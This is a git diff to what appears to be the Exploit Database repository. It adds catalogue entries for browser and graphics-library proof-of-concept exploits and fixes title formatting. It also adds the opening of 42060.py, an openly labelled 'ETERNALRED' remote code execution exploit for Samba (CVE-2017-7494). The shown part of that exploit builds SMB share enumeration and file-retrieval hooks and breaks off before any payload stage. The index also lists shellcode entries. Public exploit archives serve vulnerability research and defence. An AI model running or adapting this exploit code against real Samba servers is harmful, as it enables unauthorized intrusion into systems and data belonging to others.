diff --git a/files.csv b/files.csv
index 0959e9ddc..f83cfa890 100644
--- a/files.csv
+++ b/files.csv
@@ -5514,6 +5514,10 @@ id,file,description,date,author,platform,type,port
 42054,platforms/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",multiple,dos,0
 42055,platforms/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",multiple,dos,0
 42056,platforms/macos/dos/42056.c,"Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos,0
+42063,platforms/multiple/dos/42063.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'WebCore::FrameView::scheduleRelayout' Use-After-Free",2017-05-25,"Google Security Research",multiple,dos,0
+42070,platforms/multiple/dos/42070.c,"Skia Graphics Library - Heap Overflow due to Rounding Error in SkEdge::setLine",2017-05-25,"Google Security Research",multiple,dos,0
+42071,platforms/multiple/dos/42071.html,"Mozilla Firefox < 53 - 'gfxTextRun' Out-of-Bounds Read",2017-05-25,"Google Security Research",multiple,dos,0
+42072,platforms/multiple/dos/42072.html,"Mozilla Firefox < 53 - 'ConvolvePixel' Memory Disclosure",2017-05-25,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5830,7 +5834,7 @@ id,file,description,date,author,platform,type,port
 1962,platforms/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",osx,local,0
 1973,platforms/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",osx,local,0
 1978,platforms/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",windows,local,0
-1985,platforms/windows/local/1985.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow",2006-07-05,muts,windows,local,0
+1985,platforms/windows/local/1985.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow",2006-07-05,muts,windows,local,0
 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French)",2006-07-06,NSRocket,windows,local,0
 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0
 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0
@@ -9217,11 +9221,11 @@ id,file,description,date,author,platform,type,port
 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
 584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0
-588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
+588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP 'STOR' Buffer Overflow",2004-10-21,muts,windows,remote,21
 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21
-598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow",2004-10-26,muts,windows,remote,25
+598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Buffer Overflow",2004-10-26,muts,windows,remote,25
 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Heap Overflow",2004-10-28,infamous41md,linux,remote,69
 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0
 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0
@@ -9243,7 +9247,7 @@ id,file,description,date,author,platform,type,port
 654,platforms/windows/remote/654.c,"Winamp 5.06 - 'IN_CDDA.dll' Remote Buffer Overflow",2004-11-24,k-otik,windows,remote,0
 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143
 660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
-663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143
+663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143
 668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143
 670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
@@ -9416,8 +9420,8 @@ id,file,description,date,author,platform,type,port
 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 - compareTo() Remote Code Execution",2005-12-12,"Aviv Raff",multiple,remote,0
 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",windows,remote,0
 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105
-1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow",2005-12-19,muts,windows,remote,0
-1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow",2005-12-20,muts,windows,remote,143
+1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Buffer Overflow",2005-12-19,muts,windows,remote,0
+1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,windows,remote,143
 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21
 1391,platforms/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0
 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80
@@ -9507,7 +9511,7 @@ id,file,description,date,author,platform,type,port
 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
 2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21
 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21
-2258,platforms/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110
+2258,platforms/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow",2006-08-26,muts,windows,remote,110
 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
 2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote,0
 2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0
@@ -9943,7 +9947,7 @@ id,file,description,date,author,platform,type,port
 5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80
 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
-5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
+5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Unauthenticated Overflow (SEH)",2008-04-02,muts,windows,remote,7510
 5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
@@ -10084,7 +10088,7 @@ id,file,description,date,author,platform,type,port
 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",hardware,remote,0
 7402,platforms/windows/remote/7402.html,"EasyMail ActiveX - 'emmailstore.dll 6.5.0.3' Buffer Overflow",2008-12-09,e.wiZz!,windows,remote,0
 7403,platforms/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow",2008-12-10,"Guido Landi",windows,remote,0
-7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (Windows Vista)",2008-12-10,muts,windows,remote,0
+7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow",2008-12-10,muts,windows,remote,0
 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS - Alternate Data Streams File Disclosure",2008-12-12,"Simon Ryeo",windows,remote,0
 7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow",2008-12-14,SkD,windows,remote,69
 7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (All-in-One)",2008-12-15,krafty,windows,remote,0
@@ -10907,7 +10911,7 @@ id,file,description,date,author,platform,type,port
 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16473,platforms/windows/remote/16473.rb,"Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
-16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0
+16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0
 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16476,platforms/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -13653,7 +13657,7 @@ id,file,description,date,author,platform,type,port
 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,windows,remote,0
 26529,platforms/multiple/remote/26529.rb,"Java Applet - ProviderSkeleton Insecure Invoke Method (Metasploit)",2013-07-01,Metasploit,multiple,remote,0
 26531,platforms/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,multiple,remote,0
-26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote,0
+26536,platforms/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote,0
 26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 - '.SVG' Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0
 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0
 26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
@@ -15540,6 +15544,7 @@ id,file,description,date,author,platform,type,port
 42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
 42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
 42057,platforms/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote,0
+42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -25921,9 +25926,9 @@ id,file,description,date,author,platform,type,port
 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php symb Parameter' Cross-Site Scripting",2012-07-21,muts,php,webapps,0
 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0
 19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0
-20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0
+20011,platforms/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0
 20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary '.PHP' File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps,0
-20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php q Parameter' SQL Injection",2012-07-22,muts,php,webapps,0
+20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php' q Parameter SQL Injection",2012-07-22,muts,php,webapps,0
 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0
 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0
 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php id Parameter' Blind SQL Injection",2012-07-23,muts,linux,webapps,0
@@ -37898,4 +37903,10 @@ id,file,description,date,author,platform,type,port
 42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
 42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
 42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
-42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
+42044,platforms/php/webapps/42044.txt,"PlaySMS 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
+42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
+42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
+42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
+42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
+42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in FrameLoader::clear",2017-05-25,"Google Security Research",multiple,webapps,0
+42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
diff --git a/platforms/linux/remote/42060.py b/platforms/linux/remote/42060.py
new file mode 100755
index 000000000..76b13165a
--- /dev/null
+++ b/platforms/linux/remote/42060.py
@@ -0,0 +1,468 @@
+#! /usr/bin/env python
+# Title : ETERNALRED 
+# Date: 05/24/2017
+# Exploit Author: steelo <knownsteelo@gmail.com>
+# Vendor Homepage: https://www.samba.org
+# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14
+# CVE-2017-7494
+
+
+import argparse
+import os.path
+import sys
+import tempfile
+import time
+from smb.SMBConnection import SMBConnection
+from smb import smb_structs
+from smb.base import _PendingRequest
+from smb.smb2_structs import *
+from smb.base import *
+
+
+class SharedDevice2(SharedDevice):
+    def __init__(self, type, name, comments, path, password):
+        super().__init__(type, name, comments)
+        self.path = path
+        self.password = password
+
+class SMBConnectionEx(SMBConnection):
+    def __init__(self, username, password, my_name, remote_name, domain="", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):
+        super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)
+
+
+    def hook_listShares(self):
+        self._listShares = self.listSharesEx
+
+    def hook_retrieveFile(self):
+        self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix
+
+    # This is maily the original listShares but request a higher level of info
+    def listSharesEx(self, callback, errback, timeout = 30):
+        if not self.has_authenticated:
+            raise NotReadyError('SMB connection not authenticated')
+
+        expiry_time = time.time() + timeout
+        path = 'IPC$'
+        messages_history = [ ]
+
+        def connectSrvSvc(tid):
+            m = SMB2Message(SMB2CreateRequest('srvsvc',
+                                              file_attributes = 0,
+                                              access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,
+                                              share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+                                              oplock = SMB2_OPLOCK_LEVEL_NONE,
+                                              impersonation = SEC_IMPERSONATE,
+                                              create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,
+                                              create_disp = FILE_OPEN))
+
+            m.tid = tid
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)
+            messages_history.append(m)
+
+        def connectSrvSvcCB(create_message, **kwargs):
+            messages_history.append(create_message)
+            if create_message.status == 0:
+                call_id = self._getNextRPCCallID()
+                # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]
+                # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream
+                data_bytes = \
+                    binascii.unhexlify(b"""05 00 0b 03 10 00 00 00 74 00 00 00""".replace(b' ', b'')) + \
+                    struct.pack('<I', call_id) + \
+                    binascii.unhexlify(b"""
+b8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00
+c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88
+03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00
+2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b
+70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00
+2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00
+01 00 00 00
+""".replace(b' ', b'').replace(b'\n', b''))
+                m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))
+                m.tid = create_message.tid
+                self._sendSMBMessage(m)
+                self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)
+                messages_history.append(m)
+            else:
+                errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))
+
+        def rpcBindCB(trans_message, **kwargs):
+            messages_history.append(trans_message)
+            if trans_message.status == 0:
+                m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))
+                m.tid = trans_message.tid
+                self._sendSMBMessage(m)
+                self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])
+                messages_history.append(m)
+            else:
+                closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')
+
+        def rpcReadCB(read_message, **kwargs):
+            messages_history.append(read_message)
+            if read_message.status == 0:
+                call_id = self._getNextRPCCallID()
+
+                padding = b''
+                remote_name = '\\\\' + self.remote_name
+                server_len = len(remote_name) + 1
+                server_bytes_len = server_len * 2
+                if server_len % 2 != 0:
+                    padding = b'\0\0'
+                    server_bytes_len += 2
+
+                # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.
+                # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream
+                data_bytes = \
+                    binascii.unhexlify(b"""05 00 00 03 10 00 00 00""".replace(b' ', b'')) + \
+                    struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \
+                    binascii.unhexlify(b"""4c 00 00 00 00 00 0f 00 00 00 02 00""".replace(b' ', b'')) + \
+                    struct.pack('<III', server_len, 0, server_len) + \
+                    (remote_name + '\0').encode('UTF-16LE') + padding + \
+                    binascii.unhexlify(b"""
+02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00
+00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00
+""".replace(b' ', b'').replace(b'\n', b''))
+                m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))
+                m.tid = read_message.tid
+                self._sendSMBMessage(m)
+                self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])
+                messages_history.append(m)
+            else:
+                closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')
+
+        def listShareResultsCB(result_message, **kwargs):
+            messages_history.append(result_message)
+            if result_message.status == 0:
+                # The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.
+                data_bytes = result_message.payload.out_data
+
+                if data_bytes[3] & 0x02 == 0:
+                    sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)
+                else:
+                    decodeResults(result_message.tid, kwargs['fid'], data_bytes)
+            elif result_message.status == 0x0103:   # STATUS_PENDING
+                self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])
+            else:
+                closeFid(result_message.tid, kwargs['fid'])
+                errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))
+
+        def decodeResults(tid, fid, data_bytes):
+            shares_count = struct.unpack('<I', data_bytes[36:40])[0]
+            results = [ ]     # A list of SharedDevice2 instances
+            offset = 36 + 52  # You need to study the byte stream to understand the meaning of these constants
+            for i in range(0, shares_count):
+                results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))
+                offset += 12
+
+            for i in range(0, shares_count):
+                max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
+                offset += 12
+                results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
+
+                if length % 2 != 0:
+                    offset += (length * 2 + 2)
+                else:
+                    offset += (length * 2)
+
+                max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
+                offset += 12
+                results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
+
+                if length % 2 != 0:
+                    offset += (length * 2 + 2)
+                else:
+                    offset += (length * 2)
+
+                max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
+                offset += 12
+                results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
+
+                if length % 2 != 0:
+                    offset += (length * 2 + 2)
+                else:
+                    offset += (length * 2)
+
+                max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
+                offset += 12
+                results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
+
+                if length % 2 != 0:
+                    offset += (length * 2 + 2)
+                else:
+                    offset += (length * 2)
+
+
+            closeFid(tid, fid)
+            callback(results)
+
+        def sendReadRequest(tid, fid, data_bytes):
+            read_count = min(4280, self.max_read_size)
+            m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))
+            m.tid = tid
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,
+                                                           fid = fid, data_bytes = data_bytes)
+
+        def readCB(read_message, **kwargs):
+            messages_history.append(read_message)
+            if read_message.status == 0:
+                data_len = read_message.payload.data_length
+                data_bytes = read_message.payload.data
+
+                if data_bytes[3] & 0x02 == 0:
+                    sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])
+                else:
+                    decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])
+            else:
+                closeFid(read_message.tid, kwargs['fid'])
+                errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))
+
+        def closeFid(tid, fid, results = None, error = None):
+            m = SMB2Message(SMB2CloseRequest(fid))
+            m.tid = tid
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)
+            messages_history.append(m)
+
+        def closeCB(close_message, **kwargs):
+            if kwargs['results'] is not None:
+                callback(kwargs['results'])
+            elif kwargs['error'] is not None:
+                errback(OperationFailure(kwargs['error'], messages_history))
+
+        if path not in self.connected_trees:
+            def connectCB(connect_message, **kwargs):
+                messages_history.append(connect_message)
+                if connect_message.status == 0:
+                    self.connected_trees[path] = connect_message.tid
+                    connectSrvSvc(connect_message.tid)
+                else:
+                    errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))
+
+            m = SMB2Message(SMB2TreeConnectRequest(r'\\%s\%s' % ( self.remote_name.upper(), path )))
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)
+            messages_history.append(m)
+        else:
+            connectSrvSvc(self.connected_trees[path])
+
+
+    # Don't convert to Window style path
+    def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):
+        if not self.has_authenticated:
+            raise NotReadyError('SMB connection not authenticated')
+
+        messages_history = [ ]
+
+
+        def sendOpen(tid):
